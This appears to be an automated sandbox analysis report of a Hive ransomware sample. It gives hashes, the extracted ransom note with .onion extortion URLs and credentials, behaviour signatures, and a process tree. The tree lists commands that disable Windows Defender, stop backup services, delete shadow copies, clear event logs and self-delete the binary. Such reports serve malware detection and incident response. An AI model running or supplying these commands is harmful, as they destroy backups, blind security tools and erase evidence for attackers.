Analysis

  • max time kernel
    115s
  • max time network
    133s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20250217-en locale:en-us os:windows10-2004-x64 system
  • submitted
    12/03/2025, 01:26

General

  • Target

    2025-03-12_074ce128e23528f00e98eac6ae9a6618_frostygoop_hive_sliver_snatch.exe

  • Size

    3.7MB

  • MD5

    074ce128e23528f00e98eac6ae9a6618

  • SHA1

    39b2c91abb87af6399a7befab2fc100a03631258

  • SHA256

    04371796ab1e77b188bf8f1007466552b2faf7176918f3e0b6ce499d3ba57411

  • SHA512

    1db6635586bd506d4ca98e6be8b759fcfb8f44b7b6c3a96abf62986e4be49b5a04e3003dc379c8ea28342b3837ba71a32fa598125b8af001faebed9d8a23d97e

  • SSDEEP

    24576:ajAj4d2Cc/8o+1WkGHIvl4Bw5vJULHsbDwPD9cAXVCEbEWBgvM7eTVVfR35e7xLP:ayxIZk9FO5e1lqd/E+e7CZti1D1f

Malware Config

Extracted

Path

C:\Program Files\yxjL_HOW_TO_DECRYPT.txt

Family

hive

Ransom Note
Your network has been breached and all data were encrypted. Personal data, financial reports and important documents are ready to disclose. To decrypt all the data and to prevent exfiltrated files to be disclosed at http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/ you will need to purchase our decryption software. Please contact our sales department at: http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/ Login: 1i7Cpkz1ZCc4 Password: rX7WMQu6mrF6DBtf4eM2 To get an access to .onion websites download and install Tor Browser at: https://www.torproject.org/ (Tor Browser is not related to us) Follow the guidelines below to avoid losing your data: - Do not modify, rename or delete *.key.vsbnw files. Your data will be undecryptable. - Do not modify or rename encrypted files. You will lose them. - Do not report to the Police, FBI, etc. They don't care about your business. They simply won't allow you to pay. As a result you will lose everything. - Do not hire a recovery company. They can't decrypt without the key. They also don't care about your business. They believe that they are good negotiators, but it is not. They usually fail. So speak for yourself. - Do not reject to purchase. Exfiltrated files will be publicly disclosed.
URLs

http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/

http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/

Signatures

  • Disables service(s) 3 TTPs
  • Hive

    A ransomware written in Golang first seen in June 2021.

  • Hive family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs
  • Modifies security service 2 TTPs 1 IoCs
  • Clears Windows event logs 1 TTPs 3 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Renames multiple (1225) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Renames multiple (78) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

  • Modifies Security services 2 TTPs 6 IoCs

    Modifies the startup behavior of a security service.

  • Drops file in Program Files directory 64 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utility to control services on the system.

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-03-12_074ce128e23528f00e98eac6ae9a6618_frostygoop_hive_sliver_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-03-12_074ce128e23528f00e98eac6ae9a6618_frostygoop_hive_sliver_snatch.exe"
    1⤵
    • Drops file in Program Files directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4812
    • C:\Windows\SysWOW64\net.exe
      net.exe stop "SamSs" /y
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:952
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop "SamSs" /y
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2192
    • C:\Windows\SysWOW64\net.exe
      net.exe stop "SDRSVC" /y
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2496
      • C:\Windows\SysWOW64\net1.exe
        C:\Windows\system32\net1 stop "SDRSVC" /y
        3⤵
          PID:2280
      • C:\Windows\SysWOW64\net.exe
        net.exe stop "SstpSvc" /y
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2932
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop "SstpSvc" /y
          3⤵
          • System Location Discovery: System Language Discovery
          PID:700
      • C:\Windows\SysWOW64\net.exe
        net.exe stop "vmicvss" /y
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3388
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 stop "vmicvss" /y
          3⤵
            PID:2056
        • C:\Windows\SysWOW64\net.exe
          net.exe stop "VSS" /y
          2⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3948
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop "VSS" /y
            3⤵
            • System Location Discovery: System Language Discovery
            PID:4588
        • C:\Windows\SysWOW64\net.exe
          net.exe stop "wbengine" /y
          2⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3180
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop "wbengine" /y
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2356
        • C:\Windows\SysWOW64\net.exe
          net.exe stop "WebClient" /y
          2⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3028
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop "WebClient" /y
            3⤵
            • System Location Discovery: System Language Discovery
            PID:1040
        • C:\Windows\SysWOW64\net.exe
          net.exe stop "UnistoreSvc_276d3" /y
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3792
          • C:\Windows\SysWOW64\net1.exe
            C:\Windows\system32\net1 stop "UnistoreSvc_276d3" /y
            3⤵
            • System Location Discovery: System Language Discovery
            PID:2636
        • C:\Windows\SysWOW64\sc.exe
          sc.exe config "SamSs" start= disabled
          2⤵
          • Launches sc.exe
          • System Location Discovery: System Language Discovery
          PID:3924
        • C:\Windows\SysWOW64\sc.exe
          sc.exe config "SDRSVC" start= disabled
          2⤵
          • Launches sc.exe
          • System Location Discovery: System Language Discovery
          PID:116
        • C:\Windows\SysWOW64\sc.exe
          sc.exe config "SstpSvc" start= disabled
          2⤵
          • Launches sc.exe
          • System Location Discovery: System Language Discovery
          PID:4808
        • C:\Windows\SysWOW64\sc.exe
          sc.exe config "vmicvss" start= disabled
          2⤵
          • Launches sc.exe
          • System Location Discovery: System Language Discovery
          PID:3600
        • C:\Windows\SysWOW64\sc.exe
          sc.exe config "VSS" start= disabled
          2⤵
          • Launches sc.exe
          • System Location Discovery: System Language Discovery
          PID:4520
        • C:\Windows\SysWOW64\sc.exe
          sc.exe config "wbengine" start= disabled
          2⤵
          • Launches sc.exe
          • System Location Discovery: System Language Discovery
          PID:3060
        • C:\Windows\SysWOW64\sc.exe
          sc.exe config "WebClient" start= disabled
          2⤵
          • Launches sc.exe
          • System Location Discovery: System Language Discovery
          PID:1924
        • C:\Windows\SysWOW64\sc.exe
          sc.exe config "UnistoreSvc_276d3" start= disabled
          2⤵
          • Launches sc.exe
          • System Location Discovery: System Language Discovery
          PID:4212
        • C:\Windows\SysWOW64\reg.exe
          reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
          2⤵
          • Modifies Security services
          • System Location Discovery: System Language Discovery
          PID:5116
        • C:\Windows\SysWOW64\reg.exe
          reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
          2⤵
          • System Location Discovery: System Language Discovery
          PID:808
        • C:\Windows\SysWOW64\reg.exe
          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
          2⤵
          • Modifies Windows Defender DisableAntiSpyware settings
          • System Location Discovery: System Language Discovery
          PID:1128
        • C:\Windows\SysWOW64\reg.exe
          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
          2⤵
          • System Location Discovery: System Language Discovery
          PID:2836
        • C:\Windows\SysWOW64\reg.exe
          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
          2⤵
          • System Location Discovery: System Language Discovery
          PID:3528
        • C:\Windows\SysWOW64\reg.exe
          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
          2⤵
          • Modifies Windows Defender Real-time Protection settings
          PID:4672
        • C:\Windows\SysWOW64\reg.exe
          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
          2⤵
          • Modifies Windows Defender Real-time Protection settings
          • System Location Discovery: System Language Discovery
          PID:2384
        • C:\Windows\SysWOW64\reg.exe
          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
          2⤵
          • Modifies Windows Defender Real-time Protection settings
          • System Location Discovery: System Language Discovery
          PID:3940
        • C:\Windows\SysWOW64\reg.exe
          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
          2⤵
          • Modifies Windows Defender Real-time Protection settings
          • System Location Discovery: System Language Discovery
          PID:1700
        • C:\Windows\SysWOW64\reg.exe
          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
          2⤵
          • Modifies Windows Defender Real-time Protection settings
          • System Location Discovery: System Language Discovery
          PID:4552
        • C:\Windows\SysWOW64\reg.exe
          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
          2⤵
          • System Location Discovery: System Language Discovery
          PID:3096
        • C:\Windows\SysWOW64\reg.exe
          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
          2⤵
          • System Location Discovery: System Language Discovery
          PID:1820
        • C:\Windows\SysWOW64\reg.exe
          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
          2⤵
          • System Location Discovery: System Language Discovery
          PID:1260
        • C:\Windows\SysWOW64\reg.exe
          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
          2⤵
          • System Location Discovery: System Language Discovery
          PID:4240
        • C:\Windows\SysWOW64\reg.exe
          reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
          2⤵
          • System Location Discovery: System Language Discovery
          PID:1720
        • C:\Windows\SysWOW64\reg.exe
          reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
          2⤵
          • System Location Discovery: System Language Discovery
          PID:4524
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
          2⤵
          • System Location Discovery: System Language Discovery
          PID:3488
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
          2⤵
          • System Location Discovery: System Language Discovery
          PID:4684
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
          2⤵
          • System Location Discovery: System Language Discovery
          PID:3380
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
          2⤵
          • System Location Discovery: System Language Discovery
          PID:4048
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
          2⤵
          • System Location Discovery: System Language Discovery
          PID:1096
        • C:\Windows\SysWOW64\reg.exe
          reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
          2⤵
          • System Location Discovery: System Language Discovery
          PID:2056
        • C:\Windows\SysWOW64\reg.exe
          reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
          2⤵
          • System Location Discovery: System Language Discovery
          PID:3780
        • C:\Windows\SysWOW64\reg.exe
          reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
          2⤵
          • System Location Discovery: System Language Discovery
          PID:1332
        • C:\Windows\SysWOW64\reg.exe
          reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
          2⤵
            PID:4900
          • C:\Windows\SysWOW64\reg.exe
            reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
            2⤵
            • System Location Discovery: System Language Discovery
            PID:2120
          • C:\Windows\SysWOW64\reg.exe
            reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
            2⤵
            • System Location Discovery: System Language Discovery
            PID:3360
          • C:\Windows\SysWOW64\reg.exe
            reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
            2⤵
            • Modifies Security services
            • System Location Discovery: System Language Discovery
            PID:3788
          • C:\Windows\SysWOW64\reg.exe
            reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
            2⤵
            • Modifies Security services
            • System Location Discovery: System Language Discovery
            PID:1136
          • C:\Windows\SysWOW64\reg.exe
            reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
            2⤵
            • Modifies Security services
            • System Location Discovery: System Language Discovery
            PID:996
          • C:\Windows\SysWOW64\reg.exe
            reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
            2⤵
            • Modifies Security services
            • System Location Discovery: System Language Discovery
            PID:4504
          • C:\Windows\SysWOW64\reg.exe
            reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
            2⤵
            • Modifies security service
            • System Location Discovery: System Language Discovery
            PID:4136
          • C:\Windows\SysWOW64\reg.exe
            reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
            2⤵
            • Modifies Security services
            • System Location Discovery: System Language Discovery
            PID:112
          • C:\Windows\SysWOW64\wevtutil.exe
            wevtutil.exe cl system
            2⤵
            • Clears Windows event logs
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:1124
          • C:\Windows\SysWOW64\wevtutil.exe
            wevtutil.exe cl security
            2⤵
            • Clears Windows event logs
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:3300
          • C:\Windows\SysWOW64\wevtutil.exe
            wevtutil.exe cl application
            2⤵
            • Clears Windows event logs
            • Suspicious use of AdjustPrivilegeToken
            PID:2184
          • C:\Windows\SysWOW64\Wbem\wmic.exe
            wmic.exe SHADOWCOPY /nointeractive
            2⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:5056
          • C:\Windows\SysWOW64\Wbem\wmic.exe
            wmic.exe shadowcopy delete
            2⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:2272
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
            2⤵
            • System Location Discovery: System Language Discovery
            PID:384
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
            2⤵
            • System Location Discovery: System Language Discovery
            PID:3800
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell Set-MpPreference -DisableIOAVProtection $true
              3⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:1396
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
            2⤵
            • System Location Discovery: System Language Discovery
            PID:1708
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell Set-MpPreference -DisableRealtimeMonitoring $true
              3⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:372
          • C:\Windows\SysWOW64\notepad.exe
            notepad.exe C:\yxjL_HOW_TO_DECRYPT.txt
            2⤵
            • System Location Discovery: System Language Discovery
            • Opens file in notepad (likely ransom note)
            PID:2176
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\2025-03-12_074ce128e23528f00e98eac6ae9a6618_frostygoop_hive_sliver_snatch.exe"
            2⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            PID:1928
            • C:\Windows\SysWOW64\PING.EXE
              ping.exe -n 5 127.0.0.1
              3⤵
              • System Location Discovery: System Language Discovery
              • System Network Configuration Discovery: Internet Connection Discovery
              • Runs ping.exe
              PID:4360

        Network

        MITRE ATT&CK Enterprise v15

        Downloads

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_remove_18.svg.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_AAAAAAAAAAA0.vsbnw

          Filesize

          711B

          MD5

          8bb62cfad37334a15129a0da2091d472

          SHA1

          a9f223eb2bd355c8cbf7d17db501db834f39cb6c

          SHA256

          94f76b160568e3705f1e0d2d6ff3ee6927bd812032498d373bbcc516af2864f7

          SHA512

          da08c15accffeca9c1ec985899ebf234aa881546dfb80862c72bfe206dfbf92772582ff87c0636ca0a4cdeeb03635de7a24aecacba86e22683a1d689724d6dab

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\example_icons.png.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_AAAAAAAAAAA0.vsbnw

          Filesize

          683B

          MD5

          a0522ef468697e74b90c444ceb4aa17a

          SHA1

          31fa5bb9b4ada150c9001b6e9f3213644117187f

          SHA256

          57804748e775c08ae188b4d860f31e4482ab99b44ed1d8489780daa6756fb11c

          SHA512

          bbb91f8b3c204c4c04da2ad635eb18e9f224f73395dac509c438c0a645316162b6ff78e03e7af76d5da2d9e84cd0c4b5e9db1d4dc08bc3f524bcc55c1f4dbbd3

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\example_icons2x.png.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_AAAAAAAAAAA0.vsbnw

          Filesize

          1KB

          MD5

          99a1fefa123aa745b30727cc5ad50126

          SHA1

          c48f74cee78f8ed8463634d80c4112f3e12bd566

          SHA256

          7a610114be56ff131462bc67f9a23bcd4fde4fdd0158691448ab9e4a3eb2ca3b

          SHA512

          504800f03a4aa57c1cfa15b28542382728b5f3dd85309fe12ebfd711980d78d15d8241d5f54956ee41da2cd65203b7764ab7b15119457b74ebc07fcf8e55a742

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon.png.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_AAAAAAAAAAA0.vsbnw

          Filesize

          445B

          MD5

          ed537606a39879a091a8c085cf95ff38

          SHA1

          86c73d85094efbfdcd80abf119f03b64a71cbd0f

          SHA256

          42c312aa2a038ca54e9a6fe4bad8c9c044c35b4c5f421496f289c00c957d7591

          SHA512

          fc331c2e1ec84a6a83b51f365484033b3069d73c5987094cf526c45a92c3297df22fe2a35ec20382ed4d563ee604ecbdbdf17fb735f7e0118ab444b4d5db8e9d

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_2x.png.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_AAAAAAAAAAA0.vsbnw

          Filesize

          611B

          MD5

          37d179c947c13f64b7b6356f57441032

          SHA1

          9d1c1bd0c370336c229baeb2cd7f80d7b3cf4d0a

          SHA256

          71039e6370f68913e67cb8451d3127c22d3e1045ca644e4dc9821e9f6f6899aa

          SHA512

          3034a8b9694bbde20be0f7fa2596fbca8fd3f1e45810b15a5cb1a2bc6f4ef852afc36639a56f82a4e582d74684724d5c4ee43cbf5e33c94c6cf00b3c059757bf

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover.png.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_AAAAAAAAAAA0.vsbnw

          Filesize

          388B

          MD5

          6d8f7e9751f955452a9ceeb815456035

          SHA1

          e6903b2ec0f2c5632d4288f88d993d4a41f04527

          SHA256

          8bcf53efcb1b630087d4cfcedf5e48a7abaa9c71dd13745eedfd2c7cfa6827f5

          SHA512

          c869a94a224bce8ed553f5a86ffdea6d8a279e06a1c060b311cc52e4538b89e07fc0a4a76f85a28e2f62e8629a7c67101e990cc12bef2d0e2d6d7d3c1d4d7d90

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon_hover_2x.png.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_AAAAAAAAAAA0.vsbnw

          Filesize

          552B

          MD5

          f364ee8508831e375004ac82b924efd5

          SHA1

          b04bc510ef53760bdd22ce0dd9d2e2f248c16df7

          SHA256

          87da831caa04bd303918a32265830ff97648dc8adc18881ba14d1cc1d28cde85

          SHA512

          399b2da615c0373214e3cf421f502fd0de02bdb9473da644e9f23df9ea7fc792da7d36bde61a456c2451276f74877232c8bedbe55e57098c1ffd13719206bac3

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon.png.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_IgAAACIAAAA0.vsbnw

          Filesize

          388B

          MD5

          39be6b8bd8dce3ff5a1c20ac41ba993f

          SHA1

          a49d8a0c769601bf922c8aa1673bfd3a92d67855

          SHA256

          854a09f1f875a3a2e6566c593af465c9c8a3aa9b9112eb755bb09cee76224a63

          SHA512

          9fd5d4f02aa9d24ce9591ac0542d0abadf2b26208c3043220d2a0f036298199131ad804f9be20c6cc67f39e2921eebec65efb3a1e435ee7318fd8591fcc2fa2a

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_2x.png.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_AAAAAAAAAAA0.vsbnw

          Filesize

          552B

          MD5

          b34c8c3b8117b038839beefa0df5a7ce

          SHA1

          c8d1e8eb4c71d5aa02e36fe3b7365374a9e4e32b

          SHA256

          bfef65c62bfc309f698e8e0b999edfc06ad272b87d805f183551c43f08d704a9

          SHA512

          89fa9f31f62c6e119e6280dbc475c35dd7bb37c27457732a0b1cb04809a35fec44a12ccb6a3a626586d596a0636d754a9ff79ecd9ed739c5c6edea50738a60d7

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_hover.png.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_AAAAAAAAAAA0.vsbnw

          Filesize

          388B

          MD5

          2ca9f57d61ed45337ec4e6565480367f

          SHA1

          fa06ed14d72ad8ced6ad98a4e223bc80cccc5e75

          SHA256

          a584379ebf9aa0d3c0239edb7e1f114f01a9865f01c68494d5f28d410ba8d873

          SHA512

          83a172f2f304b2f634c313e248b62c11b7798f416872929ef233134bfc4ad8f44b1b4dfa123e8378a233417e1298a73088258f5671ace96ff677d1f26447de87

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\rhp_world_icon_hover_2x.png.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_PAAAADwAAAA0.vsbnw

          Filesize

          552B

          MD5

          74af10749d7f19d15c8dca65a7453415

          SHA1

          dc96d9dbffe472600548dc64c724055e62620d8d

          SHA256

          0e0084df79ab98e5df48ed1e01987f7ac3fcf4a038dd5453708d868f73a073a8

          SHA512

          83d190bf6f9cb77894e7aaf84029c40a2a0335e43d08062ca2275a2cb7a784a29b3b7b8be820c7dfb2f1458ab0528fcdfe45f05491be673b30495e1ed916999e

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\bg_pattern_RHP.png.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_JgAAACYAAAA0.vsbnw

          Filesize

          179B

          MD5

          117ec36a5cc6d82e63e8b3beae4a3099

          SHA1

          4c692192be53827f8ec8015ceb129f6e0f89e923

          SHA256

          041917c06c638a1b1accaf0d2f0b2a6dd335dea629de602e104553024d822ea4

          SHA512

          abb02a02a9161ece12464020676e880f1eed96b43a9dfd4f7ca06dc203fe633b0a712da5f151d36a5644d65aad7b2880c135df0bc42d7c1e61b44006807a8c9d

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\bg_patterns_header.png.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_AAAAAAAAAAA0.vsbnw

          Filesize

          703B

          MD5

          ccc8d470e94b3441e41521572ba86ccd

          SHA1

          d294d7e78b596fefcc8084fab7917c54d3043e27

          SHA256

          a7cdf870b0b1b8459e94ed25a29daa87f5e9050294bf6cdff3bc72f93b928f94

          SHA512

          f3b2ca4d3160a089f6959b7c8e3e6c213c0facb2733f7948a7222196d3bd8c7350015602569df2cdc7408e38b0ff6700306d7e3439f0892b4d13d9f2d5329e42

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\icons.png.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_AAAAAAAAAAA0.vsbnw

          Filesize

          7KB

          MD5

          8172eee1f0e4b5c3c0fbdd1f3bc5e028

          SHA1

          a37f8772007a6399cb9e7afb3070c5488276c4d4

          SHA256

          7491251b4247a91f3555f97bde932fd7c852b2f1a034f0de68b974b99f259f70

          SHA512

          710db848d0a0661946a2350001e4074d3fb39faf0aa1e5976f71e66fed06c0cca4e03b1a1a46506ec6787a4bad0f6ee1c76a22d10f0d5ac0bee28dccfca1ef08

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\images\themes\dark\illustrations.png.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_AAAAAAAAAAA0.vsbnw

          Filesize

          8KB

          MD5

          8609f74db505a1ec466d7a2112c1cf0c

          SHA1

          417100b2e529110c7f3884858e90260115f5d914

          SHA256

          cbf4e4c1d2d142ba701342525c2bffafdd9094765684686dce71b7c97c73ec1e

          SHA512

          685f37ef6266253421c2cc921bccef2259dd0cd70a8fc0f6c014e2e7d4398bcddd1d2a36fef29322d84300dae3d5d10f2b50c828dc5ebe4bf7784d03da6adba5

        • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\en-gb\ui-strings.js.GwYtsj3lQO-3kOzHL0hwoEFMPKtauBlFt_d44ZOLXdr_JAAAACQAAAA0.vsbnw

          Filesize

          823B

